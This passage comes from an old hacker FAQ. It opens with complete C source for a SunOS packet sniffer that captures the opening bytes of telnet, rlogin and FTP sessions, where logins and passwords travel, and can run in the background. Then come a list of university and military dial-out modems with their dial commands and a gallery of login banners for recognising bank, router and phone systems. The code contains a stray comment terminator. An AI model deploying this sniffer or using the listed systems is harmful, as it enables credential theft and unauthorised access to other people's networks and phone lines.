#include <sys/socket.h>
#include <sys/ioctl.h>

#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>

#include <netdb.h>
#include <arpa/inet.h>

#define ERR stderr

char    *malloc();
char    *device,
       *ProgName,
       *LogName;
FILE    *LOG;
int     debug=0;

#define NIT_DEV     "/dev/nit"
#define CHUNKSIZE   4096        /* device buffer size */
int     if_fd = -1;
int     Packet[CHUNKSIZE+32];

void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
 exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
 exit(err); }

#define IP          ((struct ip *)Packet)
#define IP_OFFSET   (0x1FFF)
#define SZETH       (sizeof(struct ether_header))
#define IPLEN       (ntohs(ip->ip_len))
#define IPHLEN      (ip->ip_hl)
#define TCPOFF      (tcph->th_off)
#define IPS         (ip->ip_src)
#define IPD         (ip->ip_dst)
#define TCPS        (tcph->th_sport)
#define TCPD        (tcph->th_dport)
#define IPeq(s,t)   ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN  (128)
time_t  LastTIME = 0;

struct CREC {
    struct CREC *Next,
                *Last;
    time_t  Time;              /* start time */
    struct in_addr SRCip,
                   DSTip;
    u_int   SRCport,           /* src/dst ports */
            DSTport;
    u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
    u_int   Length;            /* current data length */
    u_int   PKcnt;             /* # pkts */
    u_long  LASTseq;
};

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
     gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

 return( (he)?(he->h_name):(inet_ntoa(ip)) );
}

char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

 SFL(0,TH_FIN, 'F');
 SFL(1,TH_SYN, 'S');
 SFL(2,TH_RST, 'R');
 SFL(3,TH_PUSH,'P');
 SFL(4,TH_ACK, 'A');
 SFL(5,TH_URG, 'U');
 iobuf[6]=0;
 return(iobuf);
}

char *SERVp(port)
register u_int port;
{ static char buf[10];
 register char *p;

  switch(port) {
    case IPPORT_LOGINSERVER: p="rlogin"; break;
    case IPPORT_TELNET:      p="telnet"; break;
    case IPPORT_SMTP:        p="smtp"; break;
    case IPPORT_FTP:         p="ftp"; break;
    default: sprintf(buf,"%u",port); p=buf; break;
  }
  return(p);
}

char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
 p[strlen(p)-6]=0; /* strip " YYYY\n" */
 return(p);
}

char *NOWtm()
{ time_t tm;
 time(&tm);
 return( Ptm(&tm) );
}

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
 register struct CREC *CLtmp = \
       (struct CREC *)malloc(sizeof(struct CREC)); \
 time( &(CLtmp->Time) ); \
 CLtmp->SRCip.s_addr = SIP.s_addr; \
 CLtmp->DSTip.s_addr = DIP.s_addr; \
 CLtmp->SRCport = SPORT; \
 CLtmp->DSTport = DPORT; \
 CLtmp->Length = MIN(LEN,MAXBUFLEN); \
 bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
 CLtmp->PKcnt = 1; \
 CLtmp->Next = CLroot; \
 CLtmp->Last = NULL; \
 CLroot = CLtmp; \
}

register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;

 while(CLr != NULL) {
   if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
       IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
           break;
   CLr = CLr->Next;
 }
 return(CLr);
}

#define ADDDATA_NODE(CL,DATA,LEN) { \
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
CL->Length += LEN; \
}

#define PR_DATA(dp,ln) {    \
 register u_char lastc=0; \
 while(ln-- >0) { \
    if(*dp < 32) {  \
       switch(*dp) { \
           case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
                       break; \
           case '\r': \
           case '\n': fprintf(LOG,"\n     : "); \
                       break; \
           default  : fprintf(LOG,"^%c", (*dp + 64)); \
                       break; \
       } \
    } else { \
       if(isprint(*dp)) fputc(*dp,LOG); \
       else fprintf(LOG,"(%d)",*dp); \
    } \
    lastc = *dp++; \
 } \
 fflush(LOG); \
}

void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
  fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
                       NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  fprintf(LOG," DATA: ");
   { register u_int i = CLe->Length;
     register u_char *p = CLe->Data;
     PR_DATA(p,i);
     PR_DATA(d,dl);
   }

  fprintf(LOG,"\n-- \n");
  fflush(LOG);

  if(CLe->Next != NULL)
   CLe->Next->Last = CLe->Last;
  if(CLe->Last != NULL)
   CLe->Last->Next = CLe->Next;
  else
   CLroot = CLe->Next;
  free(CLe);
}

/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
 time_t tm; \
 time(&tm); \
 if(LastTIME<tm) { \
    register struct CREC *CLe,*CLt = CLroot; \
    LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
    while(CLe=CLt) { \
      CLt=CLe->Next; \
      if(CLe->Time <tm) \
          END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
    } \
 } \
}

void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
register struct ip     *ip;
register struct tcphdr *tcph;

{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

  if(EtherType < 0x600) {
    EtherType = *(u_short *)(cp + SZETH + 6);
    cp+=8; pktlen-=8;
  }

  if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
     return;
}

   /* ugh, gotta do an alignment :-( */
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

ip = (struct ip *)Packet;
if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
   return;
tcph = (struct tcphdr *)(Packet + IPHLEN);

if(!( (TCPD == IPPORT_TELNET) ||
      (TCPD == IPPORT_LOGINSERVER) ||
      (TCPD == IPPORT_FTP)
  )) return;

{ register struct CREC *CLm;
  register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  register u_char *p = (u_char *)Packet;

  p += ((IPHLEN * 4) + (TCPOFF * 4));

if(debug) {
 fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
 fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
 fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
}

  if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {

     CLm->PKcnt++;

     if(length>0)
       if( (CLm->Length + length) < MAXBUFLEN ) {
         ADDDATA_NODE( CLm, p,length);
       } else {
         END_NODE( CLm, p,length, "DATA LIMIT");
       }

     if(TCPFL(TH_FIN|TH_RST)) {
         END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
     }

  } else {

     if(TCPFL(TH_SYN)) {
        ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
     }

  }

  IDLE_NODE();

}

}

/* signal handler
*/
void death()
{ register struct CREC *CLe;

   while(CLe=CLroot)
       END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

   fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
   fflush(LOG);
   if(LOG != stdout)
       fclose(LOG);
   exit(1);
}

/* opens network interface, performs ioctls and reads from it,
* passing data to filter function
*/
void do_it()
{
   int cc;
   char *buf;
   u_short sp_ts_len;

   if(!(buf=malloc(CHUNKSIZE)))
       Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
 {
   struct strioctl si;
   struct ifreq    ifr;
   struct timeval  timeout;
   u_int  chunksize = CHUNKSIZE;
   u_long if_flags  = NI_PROMISC;

   if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
       Pexit(1,"Eth: nit open");

   if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
       Pexit(1,"Eth: ioctl (I_SRDOPT)");

   si.ic_timout = INFTIM;

   if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
       Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

   timeout.tv_sec = 1;
   timeout.tv_usec = 0;
   si.ic_cmd = NIOCSTIME;
   si.ic_len = sizeof(timeout);
   si.ic_dp  = (char *)&timeout;
   if(ioctl(if_fd, I_STR, (char *)&si) < 0)
       Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

   si.ic_cmd = NIOCSCHUNK;
   si.ic_len = sizeof(chunksize);
   si.ic_dp  = (char *)&chunksize;
   if(ioctl(if_fd, I_STR, (char *)&si) < 0)
       Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

   strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
   ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
   si.ic_cmd = NIOCBIND;
   si.ic_len = sizeof(ifr);
   si.ic_dp  = (char *)&ifr;
   if(ioctl(if_fd, I_STR, (char *)&si) < 0)
       Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

   si.ic_cmd = NIOCSFLAGS;
   si.ic_len = sizeof(if_flags);
   si.ic_dp  = (char *)&if_flags;
   if(ioctl(if_fd, I_STR, (char *)&si) < 0)
       Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

   if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
       Pexit(1,"Eth: ioctl (I_FLUSH)");
 }

   while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
       register char *bp = buf,
                     *bufstop = (buf + cc);

       while (bp < bufstop) {
           register char *cp = bp;
           register struct nit_bufhdr *hdrp;

           hdrp = (struct nit_bufhdr *)cp;
           cp += sizeof(struct nit_bufhdr);
           bp += hdrp->nhb_totlen;
           filter(cp, (u_long)hdrp->nhb_msglen);
       }
   }
   Pexit((-1),"Eth: read");
}
/* Authorize your program, generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */

void getauth()
{ char *buf,*getpass(),*crypt();
 char pwd[21],prmpt[81];

   strcpy(pwd,AUTHPASSWD);
   sprintf(prmpt,"(%s)UP? ",ProgName);
   buf=getpass(prmpt);
   if(strcmp(pwd,crypt(buf,pwd)))
       exit(1);
}
   */
void main(argc, argv)
int argc;
char **argv;
{
   char   cbuf[BUFSIZ];
   struct ifconf ifc;
   int    s,
          ac=1,
          backg=0;

   ProgName=argv[0];

/*     getauth(); */

   LOG=NULL;
   device=NULL;
   while((ac<argc) && (argv[ac][0] == '-')) {
      register char ch = argv[ac++][1];
      switch(toupper(ch)) {
           case 'I': device=argv[ac++];
                     break;
           case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
                        Zexit(1,"Output file cant be opened\n");
                     break;
           case 'B': backg=1;
                     break;
           case 'D': debug=1;
                     break;
           default : fprintf(ERR,
                       "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
                           ProgName);
                     exit(1);
      }
   }

   if(!device) {
       if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
           Pexit(1,"Eth: socket");

       ifc.ifc_len = sizeof(cbuf);
       ifc.ifc_buf = cbuf;
       if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
           Pexit(1,"Eth: ioctl");

       close(s);
       device = ifc.ifc_req->ifr_name;
   }

   fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
   fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
           (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");

   if(!LOG)
       LOG=stdout;

   signal(SIGINT, death);
   signal(SIGTERM,death);
   signal(SIGKILL,death);
   signal(SIGQUIT,death);

   if(backg && debug) {
        fprintf(ERR,"[Cannot bg with debug on]\n");
        backg=0;
   }

   if(backg) {
       register int s;

       if((s=fork())>0) {
          fprintf(ERR,"[pid %d]\n",s);
          exit(0);
       } else if(s<0)
          Pexit(1,"fork");

       if( (s=open("/dev/tty",O_RDWR))>0 ) {
               ioctl(s,TIOCNOTTY,(char *)NULL);
               close(s);
       }
   }
   fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
   fflush(LOG);

   do_it();
}


20. What is an Internet Outdial?

An Internet outdial is a modem connected to the Internet than you can
use to dial out.  Normal outdials will only call local numbers.  A GOD
(Global OutDial) is capable of calling long distance.  Outdials are an
inexpensive method of calling long distance BBS's.


21. What are some Internet Outdials?

This FAQ answer is excerpted from CoTNo #5:

                       Internet Outdial List v3.0
                        by Cavalier and DisordeR


Introduction
------------
There are several lists of Internet outdials floating around the net these
days. The following is a compilation of other lists, as well as v2.0 by
DeadKat(CoTNo issue 2, article 4). Unlike other lists where the author
just ripped other people and released it, we have sat down and tested
each one of these. Some of them we have gotten "Connection Refused" or
it timed out while trying to connect...these have been labeled dead.


                          Working Outdials
                          ----------------
                           as of 12/29/94

 NPA          IP Address                   Instructions
 ---          ----------                   ------------
 215          isn.upenn.edu                modem

 217          dialout.cecer.army.mil       atdt x,xxxXXXXX

 218          modem.d.umn.edu              atdt9,xxxXXXX

 303          yuma.acns.colostate.edu 3020

 412          myriad.pc.cc.cmu.edu 2600    Press D at the prompt


 412          gate.cis.pitt.edu            tn3270,
                                           connect dialout.pitt.edu,
                                           atdtxxxXXXX

 413          dialout2400.smith.edu        Ctrl } gets ENTER NUMBER: xxxxxxx

 502          outdial.louisville.edu

 502          uknet.uky.edu                connect kecnet
                                           @ dial: "outdial2400 or out"

 602          acssdial.inre.asu.edu        atdt8,,,,,[x][yyy]xxxyyyy

 614          ns2400.acs.ohio-state.edu

 614          ns9600.acs.ohio-state.edu

 713          128.249.27.153               atdt x,xxxXXXX

 714          modem.nts.uci.edu            atdt[area]0[phone]

 804          ublan.virginia.edu           connect hayes, 9,,xxx-xxxx

 804          ublan2.acc.virginia.edu      connect telnet
                                           connect hayes



                            Need Password
                            -------------

 206          rexair.cac.washington.edu    This is an unbroken password
 303          yuma.ACNS.ColoState.EDU      login: modem
 404          128.140.1.239                .modem8|CR
 415          annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"
 514          cartier.CC.UMontreal.CA      externe,9+number
 703          wal-3000.cns.vt.edu          dial2400 -aa


                           Dead/No Connect
                           ---------------

 201          idsnet
 202          modem.aidt.edu
 204          dial.cc.umanitoba.ca
 204          umnet.cc.manitoba.ca         "dial12" or "dial24"
 206          dialout24.cac.washington.edu
 207          modem-o.caps.maine.edu
 212          B719-7e.NYU.EDU              dial3/dial12/dial24
 212          B719-7f.NYU.EDU              dial3/dial12/dial24
 212          DIALOUT-1.NYU.EDU            dial3/dial12/dial24
 212          FREE-138-229.NYU.EDU         dial3/dial12/dial24
 212          UP19-4b.NYU.EDU              dial3/dial12/dial24
 215          wiseowl.ocis.temple.edu      "atz" "atdt 9xxxyyyy"
 218          aa28.d.umn.edu               "cli" "rlogin modem"
                                           at "login:"  type "modem"
 218          modem.d.umn.edu              Hayes 9,XXX-XXXX
 301          dial9600.umd.edu
 305          alcat.library.nova.edu
 305          office.cis.ufl.edu
 307          modem.uwyo.edu               Hayes  0,XXX-XXXX
 313          35.1.1.6                     dial2400-aa or dial1200-aa
                                           or dialout
 402          dialin.creighton.edu
 402          modem.criegthon.edu
 404          broadband.cc.emory.edu       ".modem8" or ".dialout"
 408          dialout.scu.edu
 408          dialout1200.scu.edu
 408          dialout2400.scu.edu
 408          dialout9600.scu.edu
 413          dialout.smith.edu
 414          modems.uwp.edu
 416          annex132.berkely.edu         atdt 9,,,,, xxx-xxxx
 416          pacx.utcs.utoronto.ca        modem
 503          dialout.uvm.edu
 513          dialout24.afit.af.mil
 513          r596adi1.uc.edu
 514          pacx.CC.UMontreal.CA         externe#9 9xxx-xxxx
 517          engdial.cl.msu.edu
 602          dial9600.telcom.arizona.edu
 603          dialout1200.unh.edu
 604          dial24-nc00.net.ubc.ca
 604          dial24-nc01.net.ubc.ca
 604          dial96-np65.net.ubc.ca
 604          gmodem.capcollege.bc.ca
 604          hmodem.capcollege.bc.ca
 609          128.119.131.11X (X= 1 - 4)   Hayes
 609          129.119.131.11x  (x = 1 to 4)
 609          wright-modem-1.rutgers.edu
 609          wright-modem-2.rutgers.edu
 612          modem_out12e7.atk.com
 612          modem_out24n8.atk.com
 614          ns2400.ircc.ohio-state.edu   "dial"
 615          dca.utk.edu                  dial2400 D 99k #
 615          MATHSUN23.MATH.UTK.EDU       dial 2400  d  99Kxxxxxxx
 616          modem.calvin.edu
 617          128.52.30.3                  2400baud
 617          dialout.lcs.mit.edu
 617          dialout1.princeton.edu
 617          isdn3.Princeton.EDU
 617          jadwingymkip0.Princeton.EDU
 617          lord-stanley.Princeton.EDU
 617          mpanus.Princeton.EDU
 617          mrmodem.wellesley.edu
 617          old-dialout.Princeton.EDU
 617          stagger.Princeton.EDU
 617          sunshine-02.lcs.mit.edu
 617          waddle.Princeton.EDU
 619          128.54.30.1                  atdt [area][phone]
 619          dialin.ucsd.edu              "dialout"
 703          modem_pool.runet.edu
 703          wal-3000.cns.vt.edu
 713          128.249.27.154               "c modem96"  "atdt 9xxx-xxxx"
                                           or "Hayes"
 713          modem12.bcm.tmc.edu
 713          modem24.bcm.tmc.edu
 713          modem24.bcm.tmc.edu
 714          mdmsrv7.sdsu.edu             atdt 8xxx-xxxx
 714          modem24.nts.uci.edu
 714          pub-gopher.cwis.uci.edu
 801          dswitch.byu.edu              "C Modem"
 808          irmodem.ifa.hawaii.edu
 902          star.ccs.tuns.ca             "dialout"
 916          129.137.33.72
 916          cc-dnet.ucdavis.edu          connect hayes/dialout
 916          engr-dnet1.engr.ucdavis.edu  UCDNET <ret> C KEYCLUB <ret>
 ???          128.119.131.11X              (1 - 4)
 ???          128.200.142.5
 ???          128.54.30.1                  nue, X to discontinue, ? for Help
 ???          128.6.1.41
 ???          128.6.1.42
 ???          129.137.33.72
 ???          129.180.1.57
 ???          140.112.3.2                  ntu            <none>
 ???          annexdial.rz.uni-duesseldorf.de
 ???          dial96.ncl.ac.uk
 ???          dialout.plk.af.mil
 ???          ee21.ee.ncu.edu.tw           cs8005
 ???          im.mgt.ncu.edu.tw            guest           <none>
 ???          modem.cis.uflu.edu
 ???          modem.ireq.hydro.qc.ca
 ???          modems.csuohio.edu
 ???          sparc20.ncu.edu.tw           u349633
 ???          sun2cc.nccu.edu.tw           ?
 ???          ts-modem.une.oz.au
 ???          twncu865.ncu.edu.tw          guest           <none>
 ???          vtnet1.cns.ut.edu            "CALL" or "call"


Conclusion
----------
If you find any of the outdials to have gone dead, changed commands,
or require password, please let us know so we can keep this list as
accurate as possible. If you would like to add to the list, feel free
to mail us and it will be included in future versions of this list,
with your name beside it. Have fun...

[Editors note: Updates have been made to this document after
              the original publication]


22. What is this system?


AIX
~~~
IBM AIX Version 3 for RISC System/6000
(C) Copyrights by IBM and by others 1982, 1990.
login:

[You will know an AIX system because it is the only Unix system that]
[clears the screen and issues a login prompt near the bottom of the]
[screen]


AS/400
~~~~~~
UserID?
Password?

Once in, type GO MAIN


CDC Cyber
~~~~~~~~~
WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.

88/02/16. 02.36.53. N265100
CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
FAMILY:

You would normally just hit return at the family prompt.  Next prompt is:

USER NAME:


CISCO Router
~~~~~~~~~~~~
                            FIRST BANK OF TNO
                          95-866 TNO VirtualBank
                         REMOTE Router -  TN043R1

                               Console Port

                               SN - 00000866

TN043R1>


DECserver
~~~~~~~~~
DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
DPS502-DS700

(c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved

Please type HELP if you need assistance

Enter username> TNO

Local>


Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
MPE XL:
EXPECTED A :HELLO COMMAND. (CIERR 6057)
MPE XL:
EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
MPE XL:


GTN
~~~
WELCOME TO CITIBANK. PLEASE SIGN ON.
XXXXXXXX

@
PASSWORD =

@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PLEASE ENTER YOUR ID:-1->
PLEASE ENTER YOUR PASSWORD:-2->

CITICORP (CITY NAME). KEY GHELP FOR HELP.
 XXX.XXX
PLEASE SELECT SERVICE REQUIRED.-3->


Lantronix Terminal Server
~~~~~~~~~~~~~~~~~~~~~~~~~
Lantronix ETS16 Version V3.1/1(940623)

Type HELP at the 'Local_15> ' prompt for assistance.

Login password>


Meridian Mail (Northern Telecom Phone/Voice Mail System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                           MMM       MMMERIDIAN
                          MMMMM     MMMMM
                        MMMMMM   MMMMMM
                       MMM  MMMMM  MMM     MMMMM     MMMMM
                     MMM   MMM   MMM     MMMMMM   MMMMMM
                    MMM         MMM     MMM MMM MMM MMM
                   MMM         MMM     MMM  MMMMM  MMM
                  MMM         MMM     MMM   MMM   MMM
                 MMM         MMM     MMM         MMM
                MMM         MMM     MMM         MMM
               MMM         MMM     MMM         MMM
              MMM         MMM     MMM         MMM
             MMM         MMM     MMM         MMM

                                         Copyright (c) Northern Telecom, 1991


Novell ONLAN
~~~~~~~~~~~~
<Control-A aka smiley face>N

[To access the systems it is best to own a copy of ONLAN/PC]


PC-Anywhere
~~~~~~~~~~~
<Control-A aka smiley face>P

[To access the systems it is best to own a copy of PCAnywhere Remote]


PRIMOS
~~~~~~
PRIMENET 19.2.7F PPOA1

<any text>

ER!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CONNECT
Primenet V 2.3  (system)
LOGIN           (you)
User id?        (system)
SAPB5           (you)
Password?       (system)
DROWSAP         (you)
OK,             (system)


ROLM CBX II
~~~~~~~~~~~
ROLM CBXII  RELEASE 9004.2.34 RB295 9000D IBMHO27568
BIND DATE:  7/APR/93
COPYRIGHT 1980, 1993 ROLM COMPANY.  ALL RIGHTS RESERVED.
ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
YOU HAVE ENTERED CPU 1
12:38:47 ON WEDNESDAY 2/15/1995

USERNAME: op

PASSWORD:

INVALID USERNAME-PASSWORD PAIR


ROLM-OSL
~~~~~~~~
MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
RELEASE 8003
OSL, PLEASE.
?


System75
~~~~~~~~
Login: root
INCORRECT LOGIN

Login: browse
Password:

Software Version: G3s.b16.2.2

Terminal Type (513, 4410, 4425): [513]


Tops-10
~~~~~~~
NIH Timesharing

NIH Tri-SMP 7.02-FF  16:30:04 TTY11
system 1378/1381/1453 Connected to Node Happy(40) Line # 12
Please LOGIN